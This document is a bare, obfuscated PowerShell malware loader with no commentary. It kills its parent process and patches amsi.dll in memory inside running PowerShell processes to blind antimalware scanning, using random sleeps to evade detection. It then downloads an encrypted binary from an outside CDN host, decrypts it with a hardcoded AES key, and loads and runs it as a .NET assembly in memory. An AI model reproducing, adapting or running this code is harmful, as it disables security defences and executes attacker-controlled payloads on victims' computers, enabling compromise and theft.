$rim = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($rim) { Stop-Process -Id $rim -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $xenon = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$xenon) { exit 1 } foreach ($mirth in $xenon) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $lake = [K]::OpenProcess(0x001F0FFF, $birch, $mirth.Id) $valley = $null $lighthouse = 0 foreach ($tide in $mirth.Modules) { if ($tide.ModuleName -eq "amsi.dll") { $valley = $tide.BaseAddress $lighthouse = $tide.ModuleMemorySize break } } if (!$valley) { continue } $journey = [byte[]]::new(32) $rose = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $sierra = $null for ($yard = 0; $yard -le $lighthouse; $yard += 32) { $glen = [IntPtr]::Zero [K]::ReadProcessMemory($lake, [IntPtr]($valley.ToInt64() + $yard), $journey, 32, [ref]$glen) $lily = $opal for ($canyon = 0; $canyon -lt 32; $canyon++) { if ($journey[$canyon] -ne $rose[$canyon]) { $lily = $birch; break } } if ($lily) { $sierra = [IntPtr]($valley.ToInt64() + $yard); break } } if (!$sierra) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $lagoon = 0 [K]::VirtualProtectEx($lake, $valley, 0x1000, 0x40, [ref]$lagoon) $blaze = [byte[]]@(0x31,0xff,0x90) $delta = 0 [K]::WriteProcessMemory($lake, [IntPtr]($sierra.ToInt64() + 0x1b), $blaze, 3, [ref]$delta) } } KJhbhb #ujhifsfiohdf setx BUILD "CVV" $gully = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $ledge = [System.Net.WebClient]::new() $thorn = $ledge.DownloadData($gully) $peak = [System.Security.Cryptography.Aes]::Create() $reef = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $leaf = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $peak.Key = $reef $peak.IV = $leaf $spire = $peak.CreateDecryptor() $sand = $spire.TransformFinalBlock($thorn, 0, $thorn.Length) $nook = [System.Reflection.Assembly]::Load($sand) $hollow = $nook.EntryPoint $hollow.Invoke($null, $null) #ujhifsfiohdf